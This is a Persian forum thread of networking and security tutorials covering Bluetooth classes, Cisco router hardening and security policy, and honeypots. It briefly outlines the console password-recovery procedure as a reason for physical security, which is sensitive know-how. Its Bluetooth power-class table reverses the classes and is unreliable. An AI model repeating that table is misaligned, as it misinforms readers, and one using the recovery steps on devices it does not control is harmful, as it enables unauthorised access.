جدول 2. دسته بندی ابزارهای Bluetooth
نوع
سطح قدرت
محدوده کاری
ابزارهای کلاس 3
100mW
تا 100 متر
ابزارهای کلاس 2
10mW
تا 10 متر
ابزارهای کلاس 1
1mW
کم تر از 10 متر

در كلاس 3، Bluetooth مي تواند با ديگر تكنولوژي هاي شبكه هاي محلي بي سيم رقابت كند. به­علاوه با توجه به نرخ انتقال داده ها پيش بيني مي شود در آينده فواصل طولاني تر را هم تحت پوشش قرار دهد.

مزاياي استفاده از Bluetooth
استفاده از Bluetooth پنج مزيت عمده براي كاربران دارد. اين مزايا Bluetooth را يك تكنولوژي جذاب و در دسترس با كارآيي بالا و هزينه كم معرفي مي كند. كارآيي و هزينه كم براي كاربران خانگي و هم چنين كاربران تجاري از مزاياي عمده است.
· جايگزيني كابل
در اغلب ابزارها تكنولوژي Bluetooth جايگزين كابل و ارتباطات جانبي مي شود.
· تسهيل در به اشتراك گذاشتن فايل
Bluetooth به اشتراك گذاشتن فايل را بين ابزارهايي كه قابليت Bluetoothشان فعال است فراهم مي كند. يك تلفن موبايل سازگار با Bluetooth مي تواند مثل يك مودم براي laptopعمل كند.
· همگام سازي بي­سيم
Bluetooth همگام­ سازي بي سيم خودكار با ديگر ابزارهايي كه Bluetoothشان فعال است را بدون ورودي كاربر فراهم مي كند.
· برنامه­ هاي كاربردي بي سيم خودكار 
Bluetooth توابع برنامه هاي كاربردي بي سيم خودكار را براي برقراري ارتباط با LAN و اينترنت پشتيباني مي كند.
· اتصال اينترنت
Bluetooth توسط گستره وسيعي از ابزارها و برنامه هاي كاربردي پشتيباني مي شود.

2. مشخصات امنيتي Bluetooth
به عنوان يك تكنولوژي بي سيم، Bluetooth ويژگي هاي امنيتي معدودي را (از بي سيم) به ارث برده است كه كاربران مي توانند آن ها را پياده سازي كنند.
شكل 2 مسير راديويي Bluetooth را نشان مي دهد.


 
شکل 2. امنيت در Bluetooth

همان گونه كه در شكل 2 مشاهده مي كنيد امنيت براي Bluetooth روي ارتباطات بي سيم متنوعي-فقط روي مسيرهاي راديويي فراهم مي شود. رمزنگاري ارتباط و تصديق هويت ممكن است فراهم شود ولي امنيت كامل end-to-end ممكن نيست. در شكل سرويس هاي امنيتي بين PDA و چاپگر، بين موبايل و laptop، بين laptop و كامپيوتر ميزي فراهم مي شود.

** دارالولایه **

درباره امضاء

شنبه 28 مرداد 1391  1:42 AM
تشکرات از این پست
amindadaadad
amindadaadad
کاربر طلایی3
تاریخ عضویت : دی 1389 
تعداد پست ها : 3567
محل سکونت : سیستان و بلوچستان

پاسخ به:آموزش های تخصصی شبکه و امنیت و ضد امنیت

پياده سازي استاندارد هاي امنيتي در مسيرياب ها 



 

امنيت دسترسي به مسير ياب:
در اين قسمت روشهايي را براي محافظت از خود مسير ياب بررسي مي كنيم كه شامل دسترسي فيزيكي، محافظت از اسامي كاربري روي مسيرياب، محافظت از نرم افزار مسيرياب، وظايف مدير شبكه، و تنظيماتي كه بايد رعايت شود. هنگامي كه به امنيت فكر مي كنيد، پياده سازي اين شرايط براي تمامي تجهيزات روي شبكه بايد انجام شود.

امنيت فيزيكي:
اگر شخصي به قسمتي از شبكه دسترسي داشته باشد، نمي توان از تغييراتي كه اعمال مي كند جلوگيري نمود
و به راحتي مي تواند كل شبكه را تسخير كند. بنابراين حدود دسترسي به منابع و اطلاعات در شبكه از موارد اوليه است كه بايد رعايت شود. يكي از قابليت هاي سيستم هاي امنيتي تعريف محدوديت هاي دسترسي مي باشد. 
عناصر تشكيل دهنده ساختار شبكه مانند مسيرياب ها از دو جهت نقش مهمي را در شبكه ايفا مي كنند يكي حفاظت از بخش هايي كه توسط آنها تفكيك شده و ديگر آنكه اگر داراي امنيت مناسب نباشد جهت حمله به نقاط ديگر مورد استفاده قرار مي گيرد.
تجهيرات شبكه، از جمله سوئيچ ها و مسيرياب ها بايد در مكاني قرار داشته باشند كه از لحاظ دسترسي فيزيكي محدود شده باشند. و دسترسي به اين مكان بايد توسط اشخاصي كه داراي دسترسي مديريتي هستند صورت گيرد. اين منطقه مي بايست توسط رويه روال هاي امنيتي مانند درب هاي امنيتي، و يا كنترل هاي الكترونيكي و... حفاظت شوند ولي اين حفاظت نبايد اشكالي در ورود مديران به اين منطقه ايجاد كند. 
حفاظت فيزيكي به اين دليل مهم مي باشد كه با دسترسي به مسيرياب به راحتي و با استفاده از مراحل حذف كلمه رمز(Password recovery) قابل اجرا است. با اين روش مي توان براحتي به قسمت هاي حساس مسيرياب دست يافت. روشهاي دسترسي به بخشهاي حساس در مسيرياب هاي مختلف متفاوت مي باشد و معمولا مراحل مشخص مي باشد. براي حذف كلمه عبور مي بايست مدير و يا هكر بايد به پورت كنسول مسيرياب متصل شده و مراحل زير را انجام دهد: 
- تنظيم مسيرياب براي اينكه در مرحله بوت شدن فايل هايي كه از قبل وجود دارند(NVRAM) خوانده نشده و مستقيم وارد قسمت مديريتي مسيرياب شود.
- راه اندازي مجدد مسيرياب
- دسترسي به محيط Accessبدون نياز به نام كاربري
- بررسي كلمه هاي عبوري و يا حذف فايل هاي ذخيره شده
- تنظيم مسيرياب براي اينكه فايل جديد ذخيره شده در (NVRAM) خوانده شود
- راه اندازي مجدد مسيرياب
دليل ديگري كه امنيت فيزيكي مي بايست رعايت شود، اين است كه مسيرياب ها داراي حافظه هاي جانبي هستند. هكر با استفاده از حافظه هايي كه داراي سيستم عامل ميباشد و تمامي تنظيماتي كه مورد نياز هكر مي باشد روي اين سيستم عامل اعمال شده است، براحتي مي تواند اين حافظه را جايگزين كرده و مسيرياب را مجدد راه اندازي نمايد اين نوع از حمله، اگر حرفه اي انجام شود براحتي قابل تشخيص نخواهد بود.
محيط قرار گيري مسيرياب بايد عاري از امواج مغناطيسي و همجنين از لحاظ رطوبت و دما كنترل شده باشد.

نسخه هاي نرم افزاري مسيرياب: 
نرم افزار مسيرياب در بازه زماني مختلف بروز رساني شده و مشكلات مربوط به آن بر طرف مي شود از اينرو دريافت اين نرم افزار و كنترل اينكه مسيرياب داراي نرم افزار بروز مي باشد، از روشهاي جلوگيري از حمله مي باشد. براي كنترل نسخه نرم افزار مسيرياب پس از ارتباط با مسيرياب از دستور show version استفاده كنيد.

تنظيم مسيرياب و دستورات آن:
پس از ارتباط با مسيرياب و login كردن، در محيط user mode كه به نام Exec mode هم معروف است قرار خواهيد گرفت. اين محيط دسترسي محدودي را به كاربر مي دهد. دسترسي به دستوراتي كه شامل تغيير تنظيمات اصلي مي باشد در محيط Priviledg EXEC mode اجازه استفاده دارند. اين محيط بعنوان Enable mode نيز شناخته مي شود. پس از ورود به محيط فوق، براي ايجاد انواع تغييرات و تنظيمات روي مسيرياب از دستور Config t استفاده كنيد. قسمت هاي مختلفي براي اعمال تنظيمات موجود است كه تعدادي از آنها عبارتند از :



• interface (config-if): is used to configure aspects of a particular interface like FastEthernet0, Ethernet 0/1, or Vlan2. 
• Line (config-line): is used to set up the console port, auxiliary port and virtual terminal lines. 
• Access-list: There are two types of IP named access lists, extended (config-ext-n) and standard (config-std-n), which can be used instead of numbered lists. Access-list mode is used for building named access lists.
• Route (config-route): is where specific parameters can be set and modified for a selected routing protocol. 
 

در جهت استاندارد كردن نحوه تصديق هويت و مشخص كردن حدود دسترسي و امكان رديابي عملكرد در مسيرياب، امكان جديدي رو مسيرياب ها از نسخه 11.1 به بعد ايجاد شد كه به authentication, (authorization, accountig)AAA معروف است. با استفاده از اين قابليت ميتوان كنترل هاي امنيتي بيشتري را روي مسيرياب پياده سازي نمود.كه نحوه عملكرد آنها را در بخش بعدي بررسي مي كنيم.

ترافيك شبكه مسيرياب و نقش :Loopback interface
وظيفه اصلي مسيرياب انتقال اطلاعات بين شبكه ها ميباشد اما خود مسيرياب نيز ترافيك ايجاد مي كند. مسيرياب ها و تجهيزات ديگر شبكه، با پروتكل هاي مختلفي مانند پروتكل هاي مسيريابي، SNMP,NTP, TFTP ، تبادل اطلاعات مي كنند. هنگامي كه مسيرياب ارتباطي را برقرار مي كند، كه اين ارتباط مي بايست داراي آدرس مبداء باشد، معمولا مسيرياب آدرسي را كه به يكي از Interface هاي خود تخصيص داده شده را استفاده مي كند. اين روش ممكن است در بعضي از سرويس ها اختلال ايحاد نمايد.
علاوه بر phisycal interface هاي روتر، قابليت ديگري در نرم افزارهاي(IOS) مسيرياب قرارداده شده كه بتوان توسط آن Interfaceهاي مجازي ياLoopback ايجاد كرد. بهترين تمرين داشتن يكي از اين Interface ها در مسيرياب است كه به عنوان آدرس مبداء ترافيك هايي خود مسيرياب استفاده شود. استفاده از اين روش در روشهاي مديريت شبكه و پياده سازي راهكارهاي امنيت مناسب است بدين ترتيب كه آدرس مبداء ترافيك ها و يا سرويسهاي ايجاد شده توسط مسيرباب ثابت است و ميتوان كنترل ها امنيتي بيشتري را روي تجهيزات ديگر پياده كرد. Loopback Interfaceتنها با تخصيص يك آدرس به آن، ايحاد مي شود. در مسير ياب هاي لبه شبكه(Boarder router) اين آدرس مي بايست در دامنه آدرس شبكه داخلي يا ناحيهDMZ باشد نه در دامنه‌ي خارج شبكه. همچنين توجه داشته باشيد كه اين آدرس با هيچ يك از Interface هاي مسيرياب تداخل نداشته باشد و حتي مانند آدرس هاي استفاده شده در شبكه داخلي نباشد.

دسترسي هاي، نامهاي كاربري، رمزهاي عبور:
: Logins and Banners
پياده سازي نشانه(Banner)، پيغامي جهت آگاهي، بر روي مسيرياب الزامي است. اين پيغام مي تواند شامل ثبت دستورات كاربري كه به مسيرياب متصل شده و يا موارد ديگر باشد. براي تنظيم اين اخطار ميتوانيد با مشاور حقوقي سازمان مشورت كنيد. اين پيغام نبايد شامل اطلاعاتي در مورد تجهيزات و يا آدرسهايي باشد كه در شبكه مورد استفاده قرار گرفته است. براي ايجاد پيغام ميتوانيد از دستور 


Banner motddelimiter message delimiter

استفاده نماييد. پورت كنسول(Con) براي اعمال تنظيمات و مديريت روتر مورد استفاده قرار ميگيرد. ميتوانيد كامپيوتري را به صورت دائمي به اين پورت متصل نماييد با اين شرط كه از دسترسي غيرمجاز به آن جلوگيري شده و در محيط كاملا امن قرار داشته باشد. اين ارتباط بايد داراي مدت زمان بدون فعاليت باشد تا بعداز اين زمان ارتباط قطع شود.


هر كاربري مي بايست با نام كاربري خود به مسيرياب دسترسي داشته باشد. با دستور Login local كه روي پورت كنسول فعال مي شود، ميتوان كاربر را وادار به Login كرد.
توجه داشته باشيد كه حداقل يك كاربر تعريف نماييد در غير اينصورت نميتوانيد به مسيرياب دسترسي داشته باشيد. قبل از اينكه از دستور Login localاستفاده نماييد حداقل يك كاربر تعريف نماييد تا بتوانيد به مسيرياب Login كنيد. نحوه تعريف كاربر به روش زير مي باشد:


Usernamename privilegelevel passwordstring



پورت هاي Aux در صورت وجود مي بايست غير فعال شوند.
VTYو مديريت از راه دور:

يكي از راههاي مديريت مسيرياب اتصال به مسير ياب با استفاده ازTelnet يا SSHمي باشد كه اين نوع ارتباطات بهVirtual terminal lineمعروف هستند. اين راههاي ارتباطي در صورتي كه نيازي به آنها نيست بايد غير فعال شوند. مديريت از راه دور مسيرياب بدون داشتن رمزنگاري مطمئن خطرناك است، چرا كه هر شخصي براحتي ميتواند با استفاده از ابزارهاي شنود، نام كاربري و رمز عبور مسيرياب را پيدا كرده و به آن دسترسي داشته باشد. براي غير فعال كردن دسترسي به مسيرياب از طريق VTY ها، ميتوانيد ليست دسترسي تعريف كرده و كليه دسترسي ها را مسدود نماييد يا از دستورTransport input noneاستفاده نماييد. نكته قابل توجه اين كه اين محدوديت ها را در صورتي كه از راه Telnet به مسيرياب متصل هستيد استفاده نكنيد:
بيشتر IOS ها داراي پنجVTY هستند، از صفر تا چهار، و نسخه هاي پيشرفته آنها پانزده يا شصت و چهار و يا بيشتر هم دارند.اينكه مسيرياب داراي چندVTY مي باشد از نكات بسيار مهم و قابل توجه است كه مي بايست به صورت كاملا امن تنطيم شوند. براي اينكه تعداد VTY  
خروجي اين دستور نشانگر اين است كه اين مسير ياب داراي هفت VTY مي باشد.
معمولا بايد VTY روي مسيرياب تنظيم شوند و يا اينكه به تعداد مورد نظر فعال باشند و بقيه غير فعال شوند. 

 
در قسمت بعد دسترسي ها و نوع سطوح دسترسي به مسيرياب را بررسي خواهيم كرد.

دسترسي ها:
Cisco IOS داراي 16 سطح دسترسي، از صفر تا 15 مي باشد. به صورت پيش فرض IOS داراي دو سطح دسترسي مي باشد. اين دو شامل محيط User EXEc كه در سطح دسترسي 1 و Enable كه به محيط priviledeged EXEc معروف است و در سطح دسترسي 15 مي باشد، تقيسم مي شوند. هر يك از دستوراتIOS در يكي از سطوح 1 يا 15 قرار دارند. اگر از دستور aaanew-model استفاده شود ميتوان از امكان AAA به صورت Local يا Remote استفاده كرد. به صورت پيش فرض در سطح دسترسي اول دستورات خاص و محدودي قابل اجرا هستند، 
دستور آخر براي انتقال مجدد Show ip به سطح 1 لازم است. اغلب نياز به تعريف بيش از دو سطج دسترسي به دستورات مسيرياب مي باشد. اين كار توسط تخصيص رمز عبور به سطوح مياني(بعنوان مثال سطح 5 يا 10) و سپس مشخص كردن دستوراتي كه در هر لايه قابل اجرا مي باشند، پياده سازي مي شود.
مواردي كه در تعريف اين سطوح مي بايست رعايت شوند:
- از دستور Username براي تعريف كاربر در لايه بالاتر از سطح اول استفاده نشود براي اين كار از دستور Enable Secret استفاده كنيد تا بتوانيد سطح مورد نظر را تعيين كنيد.
- از تعريف سطوح دسترسي زياد خودداري كنيد. ممكن است باعث ايجاد حفره هاي امنيتي ناخواسته در سيستم شود.
- در مورد تخصيص دستوراتي كه براي تنظيم مسيرياب استفاده مي شوند، به لايه هاي ديگر، نهايت دقت را انجام دهيد زيرا با اينكار كاربري كه دسترسي به يك دستور را داشته باشد مي تواند تغييراتي را روي تنظيمات اصلي مسيرياب ايجاد كند.
كلمه هاي عبور:
دو روش براي استفاده از كلمه هاي عبور در IOS وجود دارد. استفاده از مدل 7 كه از پروتكل هاي رمزنگاري Ciscoاستفاده مي كند و از امنيت كمتري برخوردار مي باشد، روش دوم استفاده از مدل 5 مي باشد كه به صورت MD5 بوده و داراي امنيت بالاتري است.پيشنهادCiscoاستفاده از مدل 5 بجاي مدل 7 مي باشد.
برا ي محافظت از محيط Priviedeg EXEc از دستور enable password استفاده نكنيد و به جاي آن دستورenable secret را وارد كنيد
نام هاي كاربري :
ابتدا بايد اشخاصي كه مجوز دسترسي به مسيرياب را دارند، داراي نام و رمز عبوري مخصوص خود باشند. علاوه بر اين براي مشخص شدن اينكه چه كسي تغيير در مسيرياب ايجاد مي كند و اين تغييرات با نام شخص، ثبت شوند بايد از Log هاي مسيرياب استفاده گردد. نام كاربري را بدون رمز عبور ايجاد نكنيد و در صورتي كه به نام كاربري، نياز نيست اين كاربر را حذف نماييد.
تعداد كاربراني را كه به محيط Configuration دسترسي دارند را محدود كنيد.
- دسترسي راه دور:
- دسترسي از راه دور غيرفعال مي باشد و مدير شبكه بايد از طريق كنسول مسيرياب را مديريت كند.
- دسترسي از راه دور- از شبكه داخلي و توسط AAA : كه در اين حالت مدير شبكه ميتواند تنها از شبكه داخلي و مطابق با كنترل هاي AAA با مسيرياب ارتباط داشته باشد.
- دسترسي راه دور- از شبكه داخلي بدون استفاده از AAA : در اين روش مدير شبكه ميتواند تنها از شبكه داخلي به مسيرياب متصل شود.
- دسترسي راه دور- از خارج شبكه توسط AAA: در اين ارتباط مدير شبكه از هر دو ناحيه داخلي و خارجي و توسطAAAبه مسيرياب متصل شود.
- دسترسي به مسيرياب از خارج شبكه: مدير شبكه ميتواند از هر دو ناحيه به مسيرياب متصل شود.
يكي از موارد مهمي كه در ارتباطات راه دور اهميت بالاي دارد امنيت اطلاعات بين فرستنده و گيرنده مي باشد. بدين ترتيب كه اگر رمزنگاري مناسب روي اين ارتباطات انجام نگرفته باشد، براحتي مي توان با ابزارهاي شنود، نام كاربر و رمز عبور را پيدا كرد.
امنيت ارتباطات راه دور توسط پروتكل هاي امنيتي مانند SSH يا IPSEC قابل افزايش مي باشد. 
نام مترجم : مهدي سعادت (مدير واحد امنيت اطلاعات مشورت)
ناشر : مهندسي شبكه همكاران سيستم

** دارالولایه **

درباره امضاء

شنبه 28 مرداد 1391  1:46 AM
تشکرات از این پست
amindadaadad
amindadaadad
کاربر طلایی3
تاریخ عضویت : دی 1389 
تعداد پست ها : 3567
محل سکونت : سیستان و بلوچستان

پاسخ به:آموزش های تخصصی شبکه و امنیت و ضد امنیت

اساس نامه امنيتي براي مسيرياب ها 
مسير ياب يكي از قسمت هاي مهم شبكه است و امنيت آن براي شبكه اي كه به آن سرويس مي دهد، از اهميت بالايي بر خوردار مي باشد.
معني امنيت براي مسيرياب چيست؟
يك تعريف ساده براي امنيت مسير ياب اين است كه آيا عملكرد، تنظيمات و مديريت آن مطابق اساس نامه امنيتي شما است؟
مفاهيم اوليه اساس نامه امنيتي براي مسير ياب:
شكل زير لايه هاي امنيتي براي مسيرياب را نشان مي دهد و امنيت هر لايه به امنيت لايه داخلي آن وابسته است.


داخلي ترين لايه، امنيت فيزيكي مسيرياب مي باشد. هر مسير ياب در صورتي كه دسترسي فيزيكي به آن موجود باشد براحتي مي توان كنترل آن را در دست گرفت. به همين دليل اين لايه در مركز تمام لايه ها قرار دارد و بايد مورد توجه قرار گيرد.
بيشتر مسيرياب ها داراي يك يا دو مسير مستقيم براي اعمال تنظيمات دارند كه به پورت كنسول معروف هستند.در سياست نامه امنيتي بايد قواعدي را براي نحوه دسترسي به اين پورت ها، تعريف كرد. 
لايه بعدي، نرم افزار و تنظيمات خود مسيرياب مي باشد. هر گاه هكري بتواند كنترل هر كدام از اين قسمت ها را بدست آورد، مي تواند كنترل لايه هاي بيروني خود را نيز در دست گيرد. اطلاعات مربوط به نام كاربر، آدرس مربوط به Interface هاي مسيرياب، ليست هاي كنترلي و موارد مهم ديگر در اين لايه نگه داري مي شوند. اين اطلاعات در صورتي كه در دسترس نفوذ گر قرار گيرند، به راحتي ميتواند مسير گردش اطلاعات در شبكه داخلي را مختل نمايد. معمولا در سياست نامه امنيتي چگونگي دسترسي به اين لايه مشخص مي شود.
لايه بعدي، مشخصات مربوط به تنظيمات پوياي مسيرياب مي باشد. از مهمترين اين قسمت ها جدول مسير يابي مي باشد. اطلاعات ديگر كه شامل وضعيت Interface ها و جدول ARP و AuditLog ها هم از عناصر مهم اين لايه مي باشند. دسترسي به اين لايه نيز، مانند لايه هاي پايين تر، براي لايه هاي خارجي مشكل ساز خواهد بود.
خارجي ترين لايه، ترافيك مربوط به شبكه هايي است كه مسيرياب آنها را به هم متصل مي سازد. به دليل اينكه استفاده از پروتكل هاي نا امن ميتوانند امنيت اين لايه را با خطر مواجه سازند بنابراين در سياست نامه امنيتي كه براي مسيرياب تدوين خواهد شد، نوع سرويس ها و پروتكل هاي ارتباطي كه اجازه عبور دارند و يا غير مجاز هستند، مي بايست مشخص شوند. 
تدوين سياست نامه امنيتي براي مسيرياب:
چند نكته مهم براي تدوين اين سياست نامه بايد رعايت شود:
[FONT=''''Times New Roman'''']- [/font]مشخص كردن : تعريف رويه و روال ها بدون مشخص كردن دستورات Security Objectives
[FONT=''''Times New Roman'''']- [/font]مشخص كردن سياست امنيتي مانند شكل قبل و تدوين چگونگي دسترسي به هركدام
[FONT=''''Times New Roman'''']- [/font]غير فعال كردن سرويس هايي كه غير مجاز هستند
در بعضي موارد مشخص كردن اينكه چه سرويس هايي مجاز هستند، مفيد نخواهد بود، به طور مثال مسيريابي كه در بستر اصلي شبكه قرار دارد و ارتباط بين شبكه هاي مختلف را برقرار مي سازد مي بايست داراي سياست نامه امنيتي مناسبي در جهت سرويس دهي به اين شبكه ها باشد و حتي كنترل هاي سطحي براي ارتباطات داشته باشد زيرا ارتباط در بستر اصلي بايد از سرعت بالاتر برخوردار بوده و موارد اصلي را تحت پوشش قرار دهد. 
سياست نامه امنيتي بايد يك سند زنده و در حال بروز رساني باشد. اين سياست نامه نيز بايد جزئي از سياست نامه كلي امنيتي باشد كه به طور كلي اجرا و بروز رساني شود. 
اعمال تغييرات در سياست نامه امنيت مسيرياب نيز بايد پس از هر تغيير انجام شود. در واقع اين سياست نامه بايد در زمان هاي مشخص و يا در مواردي كه تغييراتي چون،
ايجاد يك ارتباط بين شبكه داخلي و خارج 
تغييرات كلي در ساختار مديريت شبكه و يا رويه و روال ها 
اصلاحات كلي در ساختار امنيتي شبكه 
اضافه كردن عناصري به شبكه مانند ديواره آتش و يا *** Connection
تشخيص حمله به شبكه و يا در كنترل گرفتن قسمتي از آن
بازنگري شود.
چك ليست سياست نامه امنيتي مسيرياب:
پس از تهيه نسخه اول سياست نامه امنيتي مسيرياب اين سياست نامه را مطابق ليست زير چك نماييد تا تمام اجزاي آن با سند امنيتي شما مطابق باشد.
امنيت فيزيكي:
مشخص كردن اينكه چه شخصي مسئول نصب و يا راه اندازي مجدد مسيرياب مي باشد.
معين كردن شخصي براي نگهداري سخت افزار مسيرياب و يا تغيير سخت افزاري آن.
تعيين فردي كه ميتواند ارتباط فيزيكي به مسيرياب داشته باشد.
تعريف كنترل ها براي دسترسي به مسيرياب و رابط هاي ديگر آن.
تعريف رويه روال براي برگشت به قبل از خرابي مسيرياب.
امنيت تنظيمات ثابت روي مسيرياب:
مشخص كردن فرد يا افرادي كه ميتوانند به مسيرياب از راههاي مختلف متصل شوند.
مشخص كردن فردي كه ميتواند حدود دسترسي مديريت مسيرياب را داشته باشد.
تعريف رويه روال براي نام ها و كلمه هاي عبور و يا كلمه هاي عبوري كه به دسترسي كامل منجر خواهد شد كه شامل زمان و يا شرايطي است كه بايد اين كلمات عوض شوند.
تعريف رويه و روال هاي براي برگشت به حالت قبل و مشخص كردن فرد يا افراد مورد نظر
امنيت تنظيمات متغير:
شناخت سرويس هايي كه در مسيرياب فعال مي باشند و شبكه هايي كه بايد به اين سرويس ها دسترسي داشته باشند. 
مشخص كردن پروتكل هايي كه براي مسيريابي مورد استفاده قرار مي گيرند و قابليت هاي امنيتي كه روي هركدام بايد فعال شود.
تعريف رمزنگاري مناسب در ارتباطات ***
سرويسهاي امنيتي شبكه:
مشخص كردن پروتكل ها، پورت ها، و سرويس هايي كه بايد توسط مسيرياب اجازه داده شوند و يا مسدود شوند.
تعريف رويه روال در جهت كنترل ارتباطات با شبكه سرويس دهنده اينترنت.

مشخص كردن اينكه هنگامي كه شبكه و يا مسيرياب هك شود، چه شخص يا اشخاصي بايد مطلع شده و چه روالي بايد انجام شود از ديگر اقدامات كنترل مسيرياب مي باشد كه در سند امنيتي بايد تعريف شود.
در بخش بعدي پياده سازي امنيت در مسير ياب را بررسي خواهيم كرد.

منبع:
Akin, T., 

** دارالولایه **

درباره امضاء

شنبه 28 مرداد 1391  1:55 AM
تشکرات از این پست
amindadaadad
amindadaadad
کاربر طلایی3
تاریخ عضویت : دی 1389 
تعداد پست ها : 3567
محل سکونت : سیستان و بلوچستان

پاسخ به:آموزش های تخصصی شبکه و امنیت و ضد امنیت

چگونه نفوذگران را فريب دهيم؟ 
در جنگ بين نفوذگران و مديران امنيت شبکه، داشتن اطلاعات نشانة قدرت است. به عنوان يک مدير امنيت شبکه، هر چه بيشتر در مورد دشمنتان و روش­هاي حمله او بدانيد بهتر مي­توانيد از خودتان در مقابل او دفاع کنيد.
استفاده از Honeypotها يکي از روش­هايي است که مي­توانيم اطلاعاتي در مورد دنياي نفوذگران به دست آوريم.

Honeypot چيست؟
Honeypot يک ماشين ويژه در شبکه است که به عنوان طعمه براي نفوذگران استفاده مي­شود. به طور عمدي بر روي آن سيستم عامل آلوده به يک اسب تروا[1]، درپشتي[2] يا سرويس­دهنده­هاي ضعيف و داراي اشکال نصب مي­شود تا به عنوان يک ماشين قرباني، نفوذگران را به خود جذب کرده و مشغول نگه دارد. هم­چنين ممکن است بر روي چنين ماشيني اطلاعات غلط و گمراه­کننده­اي براي به اشتباه انداختن نفوذگر نيز گذاشته شود. 
يک سيستم Honeypot عملاً هيچ فايده­اي براي مقاصد سرويس دهي ندارد بلکه ماشين فداکاري است که با جذب نفوذگران و گمراه کردن آن­ها با اطلاعات غلط، از دسترسي به سرويس دهنده­هاي حساس جلوگيري مي­کند. اطلاعات غلط ممکن است ساعت­ها يک نفوذگر را معطل کند. در ضمن تشخيص اين نکته که سيستم موردنظر آيا واقعاً ضعف دارد يا آن­که يک Honeypot است براي نفوذگر چندان ساده نيست.
Honeynet شبکه­اي از Honeypotهاست که به گونه­اي تنظيم مي­شوند که شبيه يک شبکة واقعي به نظر برسند.

دلايل استفاده از Honeypot
Honeypotها به دو دليل استفاده مي­شوند :
اول اين که نقاط ضعف سيستم را بشناسيم. مدير سيستم مي­تواند با مشاهدة تکنيک­ها و روش­هاي استفاده شده توسط نفوذگر بفهمد سيستم چگونه شکسته مي­شود و نقاط آسيب­پذير سيستم را شناسايي و نسبت به ترميم آن­ها اقدام کند.
دليل دوم جمع­آوري اطلاعات لازم براي تعقيب و ردگيري نفوذگران است. با توجه به آن­که نفوذگر يک سيستم ضعيف و آسيب­پذير را در شبکه کشف مي­کند بنابراين تمام تلاش­هاي بعدي او پيرامون سيستم Honeypot (که يک هدف قلابي است) متمرکز مي­شود. مي­توان يک سيستم تشخيص نفوذ[3] (IDS) را در کنار اين سيستم نصب کرد تا تلاش­هاي نفوذگران براي حمله به اين هدف قلابي را گزارش دهد و شما بتوانيد اين موضوع و مبدا آن را پيگيري کنيد. 
اين در حالي است که Honeypot همزمان از شبکة واقعي در برابر حملات مراقبت مي­کند.
هدف اصلي يک Honeypot شبيه­سازي يک شبکه است که نفوذگران سعي مي­کنند به آن وارد شوند. اطلاعاتي که بعد از حمله به يک Honeypot به دست مي­آيد، مي­تواند براي کشف آسيب­پذيري­هاي شبکة فعلي و رفع آن­ها استفاده شود.

Honeypot چه کارهايي مي­تواند انجام دهد؟
با توجه به اين که از يک Honeypot چه مي­خواهيم، Honeypot مي­تواند کارهاي زير را انجام دهد :


  • <LI class=MsoNormal dir=rtl style="MARGIN: 6pt 36pt 0pt 0cm; DIRECTION: rtl; unicode-bidi: embed; TEXT-ALIGN: justify; tab-stops: list 36.0pt; mso-list: l0 level1 lfo1">فراهم کردن هشدارهايي در مورد حملات در حال انجام <LI class=MsoNormal dir=rtl style="MARGIN: 6pt 36pt 0pt 0cm; DIRECTION: rtl; unicode-bidi: embed; TEXT-ALIGN: justify; tab-stops: list 36.0pt; mso-list: l0 level1 lfo1">معطل کردن نفوذگر و دور نگه داشتن او از شبکة واقعي(نفوذگران پس از شناسايي شبکه، به طور معمول از ضعيف­ترين و آسيب­پذيرترين سيستم در شبکه شروع مي­کنند. زماني که آن­ها صرف کلنجار رفتن با اين سيستم قلابي مي­کنند مي­تواند يک آسودگي خاطر براي بقية ماشين­ها ايجاد کند.) <LI class=MsoNormal dir=rtl style="MARGIN: 6pt 36pt 0pt 0cm; DIRECTION: rtl; unicode-bidi: embed; TEXT-ALIGN: justify; tab-stops: list 36.0pt; mso-list: l0 level1 lfo1">فراهم کردن امکان مونيتورينگ بلادرنگ حملات صورت گرفته <LI class=MsoNormal dir=rtl style="MARGIN: 6pt 36pt 0pt 0cm; DIRECTION: rtl; unicode-bidi: embed; TEXT-ALIGN: justify; tab-stops: list 36.0pt; mso-list: l0 level1 lfo1">فراهم کردن اطلاعاتي در مورد جزئيات حمله (اطلاعاتي از قبيل اين که نفوذگران چه کساني هستند، چه مي­خواهند، سطح مهارت­هايشان و ابزارهايي که استفاده مي­کنند)
  • فراهم کردن امکان رديابي و پيگرد قانوني نفوذگر



هم­چنين Honeypot مانع انجام کارهاي زير توسط نفوذگر مي­شود :


  • <LI class=MsoNormal dir=rtl style="MARGIN: 6pt 36pt 0pt 0cm; DIRECTION: rtl; unicode-bidi: embed; TEXT-ALIGN: justify; tab-stops: list 36.0pt; mso-list: l1 level1 lfo2">دسترسي به داده­هاي واقعي <LI class=MsoNormal dir=rtl style="MARGIN: 6pt 36pt 0pt 0cm; DIRECTION: rtl; unicode-bidi: embed; TEXT-ALIGN: justify; tab-stops: list 36.0pt; mso-list: l1 level1 lfo2">کنترل­هاي مديريتي در سطح شبکه <LI class=MsoNormal dir=rtl style="MARGIN: 6pt 36pt 0pt 0cm; DIRECTION: rtl; unicode-bidi: embed; TEXT-ALIGN: justify; tab-stops: list 36.0pt; mso-list: l1 level1 lfo2">دستيابي به ترافيک واقعي شبکه
  • کنترل بر ديگر ابزارهاي متصل به شبکه


با استفاده از مهندسي اجتماعي[4] مي­توان Honeypot را جالب­تر کرد. هرچه Honeynet شما به شبکة سازمان شما شبيه­تر باشد، محيط واقعي­تر است و باعث مي­شود نفوذگران آن را بيشتر باور کنند و حتي نفوذگران حرفه­اي هم به راحتي فريب بخورند. يک پيشنهاد خوب اين است که تعدادي حساب کاربري تعريف کرده و به آن­ها يک سري دايرکتوري و اسناد اختصاص بدهيد، برايشان پست الکترونيکي تعريف کنيد، آنها را به ليست­هاي پستي اضافه کنيد، ...
هم­چنين مي­توان توسط اين سيستم نفوذگران را فريفت. به عنوان مثال وقتي نفوذگر يک ابزار استراق سمع[5] روي هدف قلابي(سيستم Honeypot) نصب مي­کند اطلاعات غلط و بيهوده براي او ارسال مي­شود و او به خيال آن که نفوذش در شبکه واقعي است، ساعت­ها وقت تلف مي­کند تا اين اطلاعات غلط را تحليل کند.
به ياد داشته باشيد که Honeypotاي که مورد حمله واقع نشود به هيچ دردي نمي­خورد. بنابراين بايد آن­ را تا حد امکان براي نفوذگر جذاب کنيد، البته تا حدي که شک نفوذگران حرفه­اي را برنينگيزد..
هرچقدر يک نفوذگر دفعات بيشتري به Honeypot وصل شود، شما بيشتر به اهداف خود دست مي­يابيد.

محل قرار گرفتن Honeypot در شبکه
